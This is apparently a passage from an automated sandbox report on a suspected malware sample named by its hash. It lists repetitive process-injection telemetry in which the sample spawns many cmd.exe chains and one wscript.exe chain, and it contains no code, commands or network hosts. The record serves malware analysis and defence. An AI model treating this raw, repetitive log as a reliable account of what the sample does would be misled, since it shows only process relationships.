PID 1748 wrote to memory of 1400 1748 cmd.exe 226 PID 1748 wrote to memory of 1400 1748 cmd.exe 226 PID 1608 wrote to memory of 1816 1608 cmd.exe 227 PID 1608 wrote to memory of 1816 1608 cmd.exe 227 PID 1608 wrote to memory of 1816 1608 cmd.exe 227 PID 1608 wrote to memory of 1816 1608 cmd.exe 227 PID 1436 wrote to memory of 1640 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 228 PID 1436 wrote to memory of 1640 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 228 PID 1436 wrote to memory of 1640 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 228 PID 1436 wrote to memory of 1640 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 228 PID 1640 wrote to memory of 612 1640 cmd.exe 230 PID 1640 wrote to memory of 612 1640 cmd.exe 230 PID 1640 wrote to memory of 612 1640 cmd.exe 230 PID 1640 wrote to memory of 612 1640 cmd.exe 230 PID 1640 wrote to memory of 1064 1640 cmd.exe 231 PID 1640 wrote to memory of 1064 1640 cmd.exe 231 PID 1640 wrote to memory of 1064 1640 cmd.exe 231 PID 1640 wrote to memory of 1064 1640 cmd.exe 231 PID 1640 wrote to memory of 1992 1640 cmd.exe 232 PID 1640 wrote to memory of 1992 1640 cmd.exe 232 PID 1640 wrote to memory of 1992 1640 cmd.exe 232 PID 1640 wrote to memory of 1992 1640 cmd.exe 232 PID 1992 wrote to memory of 892 1992 cmd.exe 233 PID 1992 wrote to memory of 892 1992 cmd.exe 233 PID 1992 wrote to memory of 892 1992 cmd.exe 233 PID 1992 wrote to memory of 892 1992 cmd.exe 233 PID 1640 wrote to memory of 840 1640 cmd.exe 234 PID 1640 wrote to memory of 840 1640 cmd.exe 234 PID 1640 wrote to memory of 840 1640 cmd.exe 234 PID 1640 wrote to memory of 840 1640 cmd.exe 234 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 235 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 235 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 235 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 235 PID 1880 wrote to memory of 708 1880 cmd.exe 237 PID 1880 wrote to memory of 708 1880 cmd.exe 237 PID 1880 wrote to memory of 708 1880 cmd.exe 237 PID 1880 wrote to memory of 708 1880 cmd.exe 237 PID 1880 wrote to memory of 1268 1880 cmd.exe 238 PID 1880 wrote to memory of 1268 1880 cmd.exe 238 PID 1880 wrote to memory of 1268 1880 cmd.exe 238 PID 1880 wrote to memory of 1268 1880 cmd.exe 238 PID 1880 wrote to memory of 1864 1880 cmd.exe 239 PID 1880 wrote to memory of 1864 1880 cmd.exe 239 PID 1880 wrote to memory of 1864 1880 cmd.exe 239 PID 1880 wrote to memory of 1864 1880 cmd.exe 239 PID 1864 wrote to memory of 1464 1864 cmd.exe 240 PID 1864 wrote to memory of 1464 1864 cmd.exe 240 PID 1864 wrote to memory of 1464 1864 cmd.exe 240 PID 1864 wrote to memory of 1464 1864 cmd.exe 240 PID 1880 wrote to memory of 1752 1880 cmd.exe 241 PID 1880 wrote to memory of 1752 1880 cmd.exe 241 PID 1880 wrote to memory of 1752 1880 cmd.exe 241 PID 1880 wrote to memory of 1752 1880 cmd.exe 241 PID 1436 wrote to memory of 1580 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 242 PID 1436 wrote to memory of 1580 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 242 PID 1436 wrote to memory of 1580 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 242 PID 1436 wrote to memory of 1580 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 242 PID 1580 wrote to memory of 1500 1580 cmd.exe 244 PID 1580 wrote to memory of 1500 1580 cmd.exe 244 PID 1580 wrote to memory of 1500 1580 cmd.exe 244 PID 1580 wrote to memory of 1500 1580 cmd.exe 244 PID 1580 wrote to memory of 520 1580 cmd.exe 245 PID 1580 wrote to memory of 520 1580 cmd.exe 245 PID 1580 wrote to memory of 520 1580 cmd.exe 245 PID 1580 wrote to memory of 520 1580 cmd.exe 245 PID 1580 wrote to memory of 1724 1580 cmd.exe 246 PID 1580 wrote to memory of 1724 1580 cmd.exe 246 PID 1580 wrote to memory of 1724 1580 cmd.exe 246 PID 1580 wrote to memory of 1724 1580 cmd.exe 246 PID 1724 wrote to memory of 936 1724 cmd.exe 247 PID 1724 wrote to memory of 936 1724 cmd.exe 247 PID 1724 wrote to memory of 936 1724 cmd.exe 247 PID 1724 wrote to memory of 936 1724 cmd.exe 247 PID 1580 wrote to memory of 1440 1580 cmd.exe 248 PID 1580 wrote to memory of 1440 1580 cmd.exe 248 PID 1580 wrote to memory of 1440 1580 cmd.exe 248 PID 1580 wrote to memory of 1440 1580 cmd.exe 248 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 249 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 249 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 249 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 249 PID 432 wrote to memory of 1836 432 cmd.exe 251 PID 432 wrote to memory of 1836 432 cmd.exe 251 PID 432 wrote to memory of 1836 432 cmd.exe 251 PID 432 wrote to memory of 1836 432 cmd.exe 251 PID 432 wrote to memory of 1196 432 cmd.exe 252 PID 432 wrote to memory of 1196 432 cmd.exe 252 PID 432 wrote to memory of 1196 432 cmd.exe 252 PID 432 wrote to memory of 1196 432 cmd.exe 252 PID 432 wrote to memory of 1536 432 cmd.exe 253 PID 432 wrote to memory of 1536 432 cmd.exe 253 PID 432 wrote to memory of 1536 432 cmd.exe 253 PID 432 wrote to memory of 1536 432 cmd.exe 253 PID 1536 wrote to memory of 1388 1536 cmd.exe 254 PID 1536 wrote to memory of 1388 1536 cmd.exe 254 PID 1536 wrote to memory of 1388 1536 cmd.exe 254 PID 1536 wrote to memory of 1388 1536 cmd.exe 254 PID 432 wrote to memory of 1672 432 cmd.exe 255 PID 432 wrote to memory of 1672 432 cmd.exe 255 PID 432 wrote to memory of 1672 432 cmd.exe 255 PID 432 wrote to memory of 1672 432 cmd.exe 255 PID 1436 wrote to memory of 1720 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 256 PID 1436 wrote to memory of 1720 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 256 PID 1436 wrote to memory of 1720 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 256 PID 1436 wrote to memory of 1720 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 256 PID 1720 wrote to memory of 1944 1720 cmd.exe 258 PID 1720 wrote to memory of 1944 1720 cmd.exe 258 PID 1720 wrote to memory of 1944 1720 cmd.exe 258 PID 1720 wrote to memory of 1944 1720 cmd.exe 258 PID 1720 wrote to memory of 1220 1720 cmd.exe 259 PID 1720 wrote to memory of 1220 1720 cmd.exe 259 PID 1720 wrote to memory of 1220 1720 cmd.exe 259 PID 1720 wrote to memory of 1220 1720 cmd.exe 259 PID 1720 wrote to memory of 1608 1720 cmd.exe 260 PID 1720 wrote to memory of 1608 1720 cmd.exe 260 PID 1720 wrote to memory of 1608 1720 cmd.exe 260 PID 1720 wrote to memory of 1608 1720 cmd.exe 260 PID 1608 wrote to memory of 612 1608 cmd.exe 261 PID 1608 wrote to memory of 612 1608 cmd.exe 261 PID 1608 wrote to memory of 612 1608 cmd.exe 261 PID 1608 wrote to memory of 612 1608 cmd.exe 261 PID 1720 wrote to memory of 1972 1720 cmd.exe 262 PID 1720 wrote to memory of 1972 1720 cmd.exe 262 PID 1720 wrote to memory of 1972 1720 cmd.exe 262 PID 1720 wrote to memory of 1972 1720 cmd.exe 262 PID 1436 wrote to memory of 1992 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 263 PID 1436 wrote to memory of 1992 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 263 PID 1436 wrote to memory of 1992 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 263 PID 1436 wrote to memory of 1992 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 263 PID 1992 wrote to memory of 840 1992 cmd.exe 265 PID 1992 wrote to memory of 840 1992 cmd.exe 265 PID 1992 wrote to memory of 840 1992 cmd.exe 265 PID 1992 wrote to memory of 840 1992 cmd.exe 265 PID 1992 wrote to memory of 1460 1992 cmd.exe 266 PID 1992 wrote to memory of 1460 1992 cmd.exe 266 PID 1992 wrote to memory of 1460 1992 cmd.exe 266 PID 1992 wrote to memory of 1460 1992 cmd.exe 266 PID 1992 wrote to memory of 1640 1992 cmd.exe 267 PID 1992 wrote to memory of 1640 1992 cmd.exe 267 PID 1992 wrote to memory of 1640 1992 cmd.exe 267 PID 1992 wrote to memory of 1640 1992 cmd.exe 267 PID 1640 wrote to memory of 708 1640 cmd.exe 268 PID 1640 wrote to memory of 708 1640 cmd.exe 268 PID 1640 wrote to memory of 708 1640 cmd.exe 268 PID 1640 wrote to memory of 708 1640 cmd.exe 268 PID 1992 wrote to memory of 820 1992 cmd.exe 269 PID 1992 wrote to memory of 820 1992 cmd.exe 269 PID 1992 wrote to memory of 820 1992 cmd.exe 269 PID 1992 wrote to memory of 820 1992 cmd.exe 269 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 270 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 270 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 270 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 270 PID 1040 wrote to memory of 1824 1040 cmd.exe 272 PID 1040 wrote to memory of 1824 1040 cmd.exe 272 PID 1040 wrote to memory of 1824 1040 cmd.exe 272 PID 1040 wrote to memory of 1824 1040 cmd.exe 272 PID 1040 wrote to memory of 432 1040 cmd.exe 273 PID 1040 wrote to memory of 432 1040 cmd.exe 273 PID 1040 wrote to memory of 432 1040 cmd.exe 273 PID 1040 wrote to memory of 432 1040 cmd.exe 273 PID 1040 wrote to memory of 1548 1040 cmd.exe 274 PID 1040 wrote to memory of 1548 1040 cmd.exe 274 PID 1040 wrote to memory of 1548 1040 cmd.exe 274 PID 1040 wrote to memory of 1548 1040 cmd.exe 274 PID 1548 wrote to memory of 1488 1548 cmd.exe 275 PID 1548 wrote to memory of 1488 1548 cmd.exe 275 PID 1548 wrote to memory of 1488 1548 cmd.exe 275 PID 1548 wrote to memory of 1488 1548 cmd.exe 275 PID 1040 wrote to memory of 1164 1040 cmd.exe 276 PID 1040 wrote to memory of 1164 1040 cmd.exe 276 PID 1040 wrote to memory of 1164 1040 cmd.exe 276 PID 1040 wrote to memory of 1164 1040 cmd.exe 276 PID 1436 wrote to memory of 912 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 277 PID 1436 wrote to memory of 912 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 277 PID 1436 wrote to memory of 912 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 277 PID 1436 wrote to memory of 912 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 277 PID 912 wrote to memory of 652 912 cmd.exe 279 PID 912 wrote to memory of 652 912 cmd.exe 279 PID 912 wrote to memory of 652 912 cmd.exe 279 PID 912 wrote to memory of 652 912 cmd.exe 279 PID 912 wrote to memory of 1464 912 cmd.exe 280 PID 912 wrote to memory of 1464 912 cmd.exe 280 PID 912 wrote to memory of 1464 912 cmd.exe 280 PID 912 wrote to memory of 1464 912 cmd.exe 280 PID 912 wrote to memory of 748 912 cmd.exe 281 PID 912 wrote to memory of 748 912 cmd.exe 281 PID 912 wrote to memory of 748 912 cmd.exe 281 PID 912 wrote to memory of 748 912 cmd.exe 281 PID 748 wrote to memory of 604 748 cmd.exe 282 PID 748 wrote to memory of 604 748 cmd.exe 282 PID 748 wrote to memory of 604 748 cmd.exe 282 PID 748 wrote to memory of 604 748 cmd.exe 282 PID 912 wrote to memory of 1580 912 cmd.exe 283 PID 912 wrote to memory of 1580 912 cmd.exe 283 PID 912 wrote to memory of 1580 912 cmd.exe 283 PID 912 wrote to memory of 1580 912 cmd.exe 283 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 284 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 284 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 284 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 284 PID 1268 wrote to memory of 1196 1268 cmd.exe 286 PID 1268 wrote to memory of 1196 1268 cmd.exe 286 PID 1268 wrote to memory of 1196 1268 cmd.exe 286 PID 1268 wrote to memory of 1196 1268 cmd.exe 286 PID 1268 wrote to memory of 1992 1268 cmd.exe 287 PID 1268 wrote to memory of 1992 1268 cmd.exe 287 PID 1268 wrote to memory of 1992 1268 cmd.exe 287 PID 1268 wrote to memory of 1992 1268 cmd.exe 287 PID 1268 wrote to memory of 1388 1268 cmd.exe 288 PID 1268 wrote to memory of 1388 1268 cmd.exe 288 PID 1268 wrote to memory of 1388 1268 cmd.exe 288 PID 1268 wrote to memory of 1388 1268 cmd.exe 288 PID 1388 wrote to memory of 816 1388 cmd.exe 289 PID 1388 wrote to memory of 816 1388 cmd.exe 289 PID 1388 wrote to memory of 816 1388 cmd.exe 289 PID 1388 wrote to memory of 816 1388 cmd.exe 289 PID 1268 wrote to memory of 432 1268 cmd.exe 290 PID 1268 wrote to memory of 432 1268 cmd.exe 290 PID 1268 wrote to memory of 432 1268 cmd.exe 290 PID 1268 wrote to memory of 432 1268 cmd.exe 290 PID 1436 wrote to memory of 1752 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 291 PID 1436 wrote to memory of 1752 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 291 PID 1436 wrote to memory of 1752 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 291 PID 1436 wrote to memory of 1752 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 291 PID 1752 wrote to memory of 1220 1752 cmd.exe 293 PID 1752 wrote to memory of 1220 1752 cmd.exe 293 PID 1752 wrote to memory of 1220 1752 cmd.exe 293 PID 1752 wrote to memory of 1220 1752 cmd.exe 293 PID 1752 wrote to memory of 1040 1752 cmd.exe 294 PID 1752 wrote to memory of 1040 1752 cmd.exe 294 PID 1752 wrote to memory of 1040 1752 cmd.exe 294 PID 1752 wrote to memory of 1040 1752 cmd.exe 294 PID 1752 wrote to memory of 1608 1752 cmd.exe 295 PID 1752 wrote to memory of 1608 1752 cmd.exe 295 PID 1752 wrote to memory of 1608 1752 cmd.exe 295 PID 1752 wrote to memory of 1608 1752 cmd.exe 295 PID 1608 wrote to memory of 520 1608 cmd.exe 296 PID 1608 wrote to memory of 520 1608 cmd.exe 296 PID 1608 wrote to memory of 520 1608 cmd.exe 296 PID 1608 wrote to memory of 520 1608 cmd.exe 296 PID 1752 wrote to memory of 1464 1752 cmd.exe 297 PID 1752 wrote to memory of 1464 1752 cmd.exe 297 PID 1752 wrote to memory of 1464 1752 cmd.exe 297 PID 1752 wrote to memory of 1464 1752 cmd.exe 297 PID 1436 wrote to memory of 740 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 298 PID 1436 wrote to memory of 740 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 298 PID 1436 wrote to memory of 740 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 298 PID 1436 wrote to memory of 740 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 298 PID 740 wrote to memory of 1580 740 cmd.exe 300 PID 740 wrote to memory of 1580 740 cmd.exe 300 PID 740 wrote to memory of 1580 740 cmd.exe 300 PID 740 wrote to memory of 1580 740 cmd.exe 300 PID 740 wrote to memory of 940 740 cmd.exe 301 PID 740 wrote to memory of 940 740 cmd.exe 301 PID 740 wrote to memory of 940 740 cmd.exe 301 PID 740 wrote to memory of 940 740 cmd.exe 301 PID 740 wrote to memory of 1640 740 cmd.exe 302 PID 740 wrote to memory of 1640 740 cmd.exe 302 PID 740 wrote to memory of 1640 740 cmd.exe 302 PID 740 wrote to memory of 1640 740 cmd.exe 302 PID 1640 wrote to memory of 820 1640 cmd.exe 303 PID 1640 wrote to memory of 820 1640 cmd.exe 303 PID 1640 wrote to memory of 820 1640 cmd.exe 303 PID 1640 wrote to memory of 820 1640 cmd.exe 303 PID 740 wrote to memory of 1992 740 cmd.exe 304 PID 740 wrote to memory of 1992 740 cmd.exe 304 PID 740 wrote to memory of 1992 740 cmd.exe 304 PID 740 wrote to memory of 1992 740 cmd.exe 304 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 305 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 305 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 305 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 305 PID 816 wrote to memory of 432 816 cmd.exe 307 PID 816 wrote to memory of 432 816 cmd.exe 307 PID 816 wrote to memory of 432 816 cmd.exe 307 PID 816 wrote to memory of 432 816 cmd.exe 307 PID 816 wrote to memory of 324 816 cmd.exe 308 PID 816 wrote to memory of 324 816 cmd.exe 308 PID 816 wrote to memory of 324 816 cmd.exe 308 PID 816 wrote to memory of 324 816 cmd.exe 308 PID 816 wrote to memory of 924 816 cmd.exe 309 PID 816 wrote to memory of 924 816 cmd.exe 309 PID 816 wrote to memory of 924 816 cmd.exe 309 PID 816 wrote to memory of 924 816 cmd.exe 309 PID 924 wrote to memory of 1220 924 cmd.exe 310 PID 924 wrote to memory of 1220 924 cmd.exe 310 PID 924 wrote to memory of 1220 924 cmd.exe 310 PID 924 wrote to memory of 1220 924 cmd.exe 310 PID 816 wrote to memory of 1816 816 cmd.exe 311 PID 816 wrote to memory of 1816 816 cmd.exe 311 PID 816 wrote to memory of 1816 816 cmd.exe 311 PID 816 wrote to memory of 1816 816 cmd.exe 311 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 312 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 312 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 312 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 312 PID 520 wrote to memory of 1464 520 cmd.exe 314 PID 520 wrote to memory of 1464 520 cmd.exe 314 PID 520 wrote to memory of 1464 520 cmd.exe 314 PID 520 wrote to memory of 1464 520 cmd.exe 314 PID 520 wrote to memory of 1368 520 cmd.exe 315 PID 520 wrote to memory of 1368 520 cmd.exe 315 PID 520 wrote to memory of 1368 520 cmd.exe 315 PID 520 wrote to memory of 1368 520 cmd.exe 315 PID 520 wrote to memory of 1064 520 cmd.exe 316 PID 520 wrote to memory of 1064 520 cmd.exe 316 PID 520 wrote to memory of 1064 520 cmd.exe 316 PID 520 wrote to memory of 1064 520 cmd.exe 316 PID 1760 wrote to memory of 1576 1760 wscript.exe 317 PID 1760 wrote to memory of 1576 1760 wscript.exe 317 PID 1760 wrote to memory of 1576 1760 wscript.exe 317 PID 1760 wrote to memory of 1576 1760 wscript.exe 317 PID 1064 wrote to memory of 788 1064 cmd.exe 319 PID 1064 wrote to memory of 788 1064 cmd.exe 319 PID 1064 wrote to memory of 788 1064 cmd.exe 319 PID 1064 wrote to memory of 788 1064 cmd.exe 319 PID 520 wrote to memory of 1824 520 cmd.exe 320 PID 520 wrote to memory of 1824 520 cmd.exe 320 PID 520 wrote to memory of 1824 520 cmd.exe 320 PID 520 wrote to memory of 1824 520 cmd.exe 320 PID 1576 wrote to memory of 1460 1576 cmd.exe 321 PID 1576 wrote to memory of 1460 1576 cmd.exe 321 PID 1576 wrote to memory of 1460 1576 cmd.exe 321 PID 1576 wrote to memory of 1460 1576 cmd.exe 321 PID 1436 wrote to memory of 1388 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 322 PID 1436 wrote to memory of 1388 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 322 PID 1436 wrote to memory of 1388 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 322 PID 1436 wrote to memory of 1388 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 322 PID 1388 wrote to memory of 544 1388 cmd.exe 324 PID 1388 wrote to memory of 544 1388 cmd.exe 324 PID 1388 wrote to memory of 544 1388 cmd.exe 324 PID 1388 wrote to memory of 544 1388 cmd.exe 324 PID 1388 wrote to memory of 1120 1388 cmd.exe 325 PID 1388 wrote to memory of 1120 1388 cmd.exe 325 PID 1388 wrote to memory of 1120 1388 cmd.exe 325 PID 1388 wrote to memory of 1120 1388 cmd.exe 325 PID 1388 wrote to memory of 1220 1388 cmd.exe 326 PID 1388 wrote to memory of 1220 1388 cmd.exe 326 PID 1388 wrote to memory of 1220 1388 cmd.exe 326 PID 1388 wrote to memory of 1220 1388 cmd.exe 326 PID 1220 wrote to memory of 1720 1220 cmd.exe 327 PID 1220 wrote to memory of 1720 1220 cmd.exe 327 PID 1220 wrote to memory of 1720 1220 cmd.exe 327 PID 1220 wrote to memory of 1720 1220 cmd.exe 327 PID 1388 wrote to memory of 652 1388 cmd.exe 328 PID 1388 wrote to memory of 652 1388 cmd.exe 328 PID 1388 wrote to memory of 652 1388 cmd.exe 328 PID 1388 wrote to memory of 652 1388 cmd.exe 328 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 329 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 329 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 329 PID 1436 wrote to memory of 1608 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 329 PID 1608 wrote to memory of 960 1608 cmd.exe 331 PID 1608 wrote to memory of 960 1608 cmd.exe 331 PID 1608 wrote to memory of 960 1608 cmd.exe 331 PID 1608 wrote to memory of 960 1608 cmd.exe 331 PID 1608 wrote to memory of 1444 1608 cmd.exe 332 PID 1608 wrote to memory of 1444 1608 cmd.exe 332 PID 1608 wrote to memory of 1444 1608 cmd.exe 332 PID 1608 wrote to memory of 1444 1608 cmd.exe 332 PID 1608 wrote to memory of 860 1608 cmd.exe 333 PID 1608 wrote to memory of 860 1608 cmd.exe 333 PID 1608 wrote to memory of 860 1608 cmd.exe 333 PID 1608 wrote to memory of 860 1608 cmd.exe 333 PID 860 wrote to memory of 1416 860 cmd.exe 334 PID 860 wrote to memory of 1416 860 cmd.exe 334 PID 860 wrote to memory of 1416 860 cmd.exe 334 PID 860 wrote to memory of 1416 860 cmd.exe 334 PID 1608 wrote to memory of 1580 1608 cmd.exe 335 PID 1608 wrote to memory of 1580 1608 cmd.exe 335 PID 1608 wrote to memory of 1580 1608 cmd.exe 335 PID 1608 wrote to memory of 1580 1608 cmd.exe 335 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 336 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 336 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 336 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 336 PID 932 wrote to memory of 1760 932 cmd.exe 338 PID 932 wrote to memory of 1760 932 cmd.exe 338 PID 932 wrote to memory of 1760 932 cmd.exe 338 PID 932 wrote to memory of 1760 932 cmd.exe 338 PID 932 wrote to memory of 1056 932 cmd.exe 339 PID 932 wrote to memory of 1056 932 cmd.exe 339 PID 932 wrote to memory of 1056 932 cmd.exe 339 PID 932 wrote to memory of 1056 932 cmd.exe 339 PID 932 wrote to memory of 820 932 cmd.exe 340 PID 932 wrote to memory of 820 932 cmd.exe 340 PID 932 wrote to memory of 820 932 cmd.exe 340 PID 932 wrote to memory of 820 932 cmd.exe 340 PID 820 wrote to memory of 912 820 cmd.exe 341 PID 820 wrote to memory of 912 820 cmd.exe 341 PID 820 wrote to memory of 912 820 cmd.exe 341 PID 820 wrote to memory of 912 820 cmd.exe 341 PID 932 wrote to memory of 1640 932 cmd.exe 343 PID 932 wrote to memory of 1640 932 cmd.exe 343 PID 932 wrote to memory of 1640 932 cmd.exe 343 PID 932 wrote to memory of 1640 932 cmd.exe 343 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 344 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 344 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 344 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 344 PID 520 wrote to memory of 324 520 cmd.exe 346 PID 520 wrote to memory of 324 520 cmd.exe 346 PID 520 wrote to memory of 324 520 cmd.exe 346 PID 520 wrote to memory of 324 520 cmd.exe 346 PID 520 wrote to memory of 1040 520 cmd.exe 347 PID 520 wrote to memory of 1040 520 cmd.exe 347 PID 520 wrote to memory of 1040 520 cmd.exe 347 PID 520 wrote to memory of 1040 520 cmd.exe 347 PID 520 wrote to memory of 1120 520 cmd.exe 348 PID 520 wrote to memory of 1120 520 cmd.exe 348 PID 520 wrote to memory of 1120 520 cmd.exe 348 PID 520 wrote to memory of 1120 520 cmd.exe 348 PID 1120 wrote to memory of 1312 1120 cmd.exe 349 PID 1120 wrote to memory of 1312 1120 cmd.exe 349 PID 1120 wrote to memory of 1312 1120 cmd.exe 349 PID 1120 wrote to memory of 1312 1120 cmd.exe 349 PID 520 wrote to memory of 1220 520 cmd.exe 350 PID 520 wrote to memory of 1220 520 cmd.exe 350 PID 520 wrote to memory of 1220 520 cmd.exe 350 PID 520 wrote to memory of 1220 520 cmd.exe 350 PID 1436 wrote to memory of 1796 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 351 PID 1436 wrote to memory of 1796 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 351 PID 1436 wrote to memory of 1796 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 351 PID 1436 wrote to memory of 1796 1436 